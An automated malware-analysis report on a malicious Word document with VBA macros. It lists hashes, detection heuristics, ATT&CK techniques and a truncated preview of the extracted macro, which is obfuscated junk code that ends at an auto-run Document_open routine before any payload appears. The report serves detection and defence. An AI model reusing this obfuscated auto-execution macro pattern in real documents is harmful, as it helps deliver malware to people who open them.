Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9914881d35a7fa7c…

MALICIOUS

Office (OLE)

152.8 KB · Created: 2018-07-23 11:08:00 · Authoring application: Microsoft Office Word · First seen: 2019-06-27
MD5: c78f61661d9bcd1a52d7f0b289ace4a4 SHA-1: b34b955b41476d293fdec803163ba41c49ac2194 SHA-256: 9914881d35a7fa7ce6f9ec06d4e5c19f12c6916a57fcc4facbb28f144e921283
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The 'Document_Open' macro combined with a 'Shell()' call indicates that the macros are designed to execute arbitrary code as soon as the document is opened. This is a common technique for downloading and executing further malicious payloads, which is why this attack pattern is assessed with high confidence. The ClamAV detection name provides a specific identifier for this threat.

Heuristics 5

  • ClamAV: Doc.Malware.Valyria-10026440-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-10026440-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 29534 bytes
SHA-256: 1bf68875b137a1cc844bf647b923b5e0afc8f0781c79ffadbe68c97eef35856d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "mVMLiwfHzQGmN"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function DqGrcBsalmcUp()
On Error Resume Next
   If HlPMG Xor 11 Then
      ElseIf OfOpP Eqv dKPwb Then
      If dWETnc = lBSAVo Then
         GEzZJ = Oct(STdfwX * 41517)
      End If
   End If
   If dBprN Xor 11 Then
      ElseIf JEozm Eqv UAvftB Then
      If KZNpmr = KtZXQG Then
         RXRLd = Oct(rzzIbW * 4692)
      End If
   End If
   If Truqnu Xor 11 Then
      ElseIf ChnwNp Eqv LznMI Then
      If DHznv = hVYKml Then
         fHNTYB = Oct(AJrjzW * 52570)
      End If
   End If
   If hACWV Xor 11 Then
      ElseIf uQLDA Eqv OPfRhj Then
      If DciTP = INaEOP Then
         dqMYUt = Oct(QWHFIc * 78715)
      End If
   End If
   If SDlhBr Xor 11 Then
      ElseIf ZUYTz Eqv QiANH Then
      If pimowS = NEKYwZ Then
         rLLNl = Oct(woQlTI * 4604)
      End If
   End If
End Function
Private Function UQjFdMtH()
On Error Resume Next
   If iKYVLU <= GqVAr Then
      Set kLtVb = PJTpTl
      cBNIv = (lWHuQ * aOIqz - zzfYku + qqkXL + 41045 - jmsFs)
   End If
   If tFsdQd <= BiGTT Then
      Set VltERT = ERAzvZ
      UnWCw = (WEunu * QwpIi - rcjzs + oYoVbF + 86446 - rSwNLD)
   End If
   If FIijw Xor 11 Then
      ElseIf RVQivN Eqv fGJHRd Then
      If kzCrO = lDlFoa Then
         jQwqSw = Oct(tIwojS * 76101)
      End If
   End If
   If MUdWBK Xor 11 Then
      ElseIf JMziPK Eqv XtPQp Then
      If XiZQp = EZBuU Then
         iMWff = Oct(fmnSq * 97927)
      End If
   End If
   If WRrGJ <= DzPIVu Then
      Set zbWvh = ZbAco
      NczAbw = (joFSFl * rVrFSj - ctrZSi + uaWoDM + 91927 - FwnMv)
   End If
End Function
Private Function YSTjndVYH()
On Error Resume Next
   If ADPCwX Xor 11 Then
      ElseIf iznrGt Eqv QRDNo Then
      If QJXBYV = uIRXLz Then
         zhnLsi = Oct(ofPNp * 88771)
      End If
   End If
   If flIGO Xor 11 Then
      ElseIf VKjKBj Eqv GWWoiL Then
      If utzfm = tYsjY Then
         ioqwB = Oct(OModO * 97741)
      End If
   End If
   If ttFjWc Xor 11 Then
      ElseIf jNidpz Eqv jPjHT Then
      If iirVF = cdHnia Then
         wPXRb = Oct(wFAahO * 86621)
      End If
   End If
   If wrcAmL Xor 11 Then
      ElseIf NEqBc Eqv GCfLs Then
      If RamjQS = CDQKnQ Then
         sWVGC = Oct(uIDJn * 12894)
      End If
   End If
   If tjFocE Xor 11 Then
      ElseIf LLHLir Eqv AwuDk Then
      If MjhZI = iJXdw Then
         nwJUK = Oct(KMcjK * 25732)
      End If
   End If
   If zzhib Xor 11 Then
      ElseIf NPCki Eqv zOYZvC Then
      If BKIwEi = MiDJG Then
         QNiIG = Oct(zlkAV * 64745)
      End If
   End If
   If CLdaX Xor 11 Then
      ElseIf NBUSF Eqv CnmZGV Then
      If dHTOq = QSwlCO Then
         GIWdCF = Oct(nwMLwT * 46038)
      End If
   End If
End Function
Private Function wrzHrQbvhRSf()
On Error Resume Next
   If sIzRMo Xor 11 Then
      ElseIf LVLEh Eqv wIrdQJ Then
      If IBTYu = FrPnK Then
         OVqLd = Oct(ZKnNj * 88657)
      End If
   End If
   If nCNhD Xor 11 Then
      ElseIf ZalrpZ Eqv Ljjwh Then
      If DSIHw = Hrzcu Then
         ZhVNC = Oct(ikUbnk * 98644)
      End If
   End If
   If OPoWC Xor 11 Then
      ElseIf scGLwP Eqv FDCMMb Then
      If mpHnU = dPBjzl Then
         YnwHK = Oct(pjfTz * 18218)
      End If
   End If
   If zNaHR Xor 11 Then
      ElseIf toGiuQ Eqv vwZwr Then
      If PsAzj = Nwjbi Then
         IaKId = Oct(UcVjt * 29164)
      End If
   End If
   If zpbolu Xor 11 Then
      ElseIf cSQBIa Eqv DYTBSF Then
      If oUQkE = jUanl Then
         KZBFvG = Oct(AVYjF * 67510)
      End If
   End If
End Function
Private Sub Document_open()
On Error Resume Next
   If ltMnWY Xor iCwVIY Then
      For BkhpY = 22 To Jqsfr
         kzNCb = 74081 * jwNaQ + dFUmZ + sImaK - jqihuB - vAocVz + jAobo - QluCp / 7684 / WzNwX / 6199 - rva
... (truncated)